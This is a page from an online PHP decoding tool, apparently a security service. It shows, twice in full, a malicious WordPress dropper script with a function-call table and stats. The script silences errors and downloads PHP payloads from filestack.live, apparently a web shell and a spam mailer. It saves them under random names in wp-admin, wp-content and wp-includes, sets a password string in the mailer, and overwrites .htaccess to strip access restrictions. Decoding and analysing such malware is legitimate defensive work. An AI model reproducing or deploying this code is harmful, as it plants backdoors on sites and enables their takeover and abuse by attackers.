Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/Zxolt4NmTc8.php"..
Decoded Output download
<? error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/Zxolt4NmTc8.php"); $p_mailer = str_replace("../", "", "./../../../wp-content/zRluLHSoNit.php"); $p_xleet = str_replace("../", "", "./../../../wp-includes/rjzTOcuAF87.php"); $root = str_replace("../", "", "./../../../"); function http_get_contents($url){$codex = file_get_contents($url);if (empty($codex)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);$urlPage = curl_exec($ch);curl_close($ch);return($urlPage);}else {return $codex;}} function save($path, $source){ if(function_exists("file_put_contents")){ file_put_contents($path, $source); }else { fwrite(fopen($path,"w"), $source); } } function read($path){ if(function_exists("file_get_contents")){ $rr = file_get_contents($path); }else { $rr = stream_get_contents(fopen($path, "r")); } return $rr; } if(!file_exists($p_olux)) { $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm"); if(preg_match("/<\?php/", $olux)){ save($p_olux, $olux); } } if(!file_exists($p_xleet)) { $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm"); if(preg_match("/<\?php/", $xleet)){ save($p_xleet, $xleet); } } if(!file_exists($p_mailer)) { $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm"); if(preg_match("/<\?php/", $mailer)){ $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "ArUHCRhbE3N", $mailer); save($p_mailer, $mailer); } } save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>"); $htx = strtolower(read($root.".htaccess")); if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) { $htx = "<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php\$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>"; chmod($root.".htaccess", 0644); save($root.".htaccess", $htx); } ?>
Did this file decode correctly?
Original Code
error_reporting(0); $p_olux = str_replace("../", "", "./../../../wp-admin/Zxolt4NmTc8.php"); $p_mailer = str_replace("../", "", "./../../../wp-content/zRluLHSoNit.php"); $p_xleet = str_replace("../", "", "./../../../wp-includes/rjzTOcuAF87.php"); $root = str_replace("../", "", "./../../../"); function http_get_contents($url){$codex = file_get_contents($url);if (empty($codex)){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);curl_setopt($ch, CURLOPT_TIMEOUT, 60);curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);$urlPage = curl_exec($ch);curl_close($ch);return($urlPage);}else {return $codex;}} function save($path, $source){ if(function_exists("file_put_contents")){ file_put_contents($path, $source); }else { fwrite(fopen($path,"w"), $source); } } function read($path){ if(function_exists("file_get_contents")){ $rr = file_get_contents($path); }else { $rr = stream_get_contents(fopen($path, "r")); } return $rr; } if(!file_exists($p_olux)) { $olux = http_get_contents("http://filestack.live/5de9c03400251a73ad64a272db83fab0.htm"); if(preg_match("/<\?php/", $olux)){ save($p_olux, $olux); } } if(!file_exists($p_xleet)) { $xleet = http_get_contents("http://filestack.live/2995e3adc0c914b5a67cc9c6fb40ad73.htm"); if(preg_match("/<\?php/", $xleet)){ save($p_xleet, $xleet); } } if(!file_exists($p_mailer)) { $mailer = http_get_contents("https://filestack.live/79f37cf98ac7d864a573c96fd19390ba.htm"); if(preg_match("/<\?php/", $mailer)){ $mailer = str_replace("xxxxxxxxxxxxxxxxxxxxxxx", "ArUHCRhbE3N", $mailer); save($p_mailer, $mailer); } } save($root."wp-includes/index.html", "<!DOCTYPE html><title></title>"); $htx = strtolower(read($root.".htaccess")); if(preg_match("/deny(.*)from(.*)all/", $htx) || preg_match("/order(.*)allow(.*)deny/", $htx)) { $htx = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteBase /\nRewriteRule ^index\.php\$ - [L]\nRewriteCond %{REQUEST_FILENAME} !-f\nRewriteCond %{REQUEST_FILENAME} !-d\nRewriteRule . /index.php [L]\n</IfModule>"; chmod($root.".htaccess", 0644); save($root.".htaccess", $htx); }
Function Calls
save | 1 |
fopen | 1 |
fwrite | 1 |
file_exists | 3 |
str_replace | 4 |
error_reporting | 1 |
function_exists | 1 |
Stats
MD5 | 338e3db83d3b844cda1f845a614cd5ef |
Eval Count | 0 |
Decode Time | 85 ms |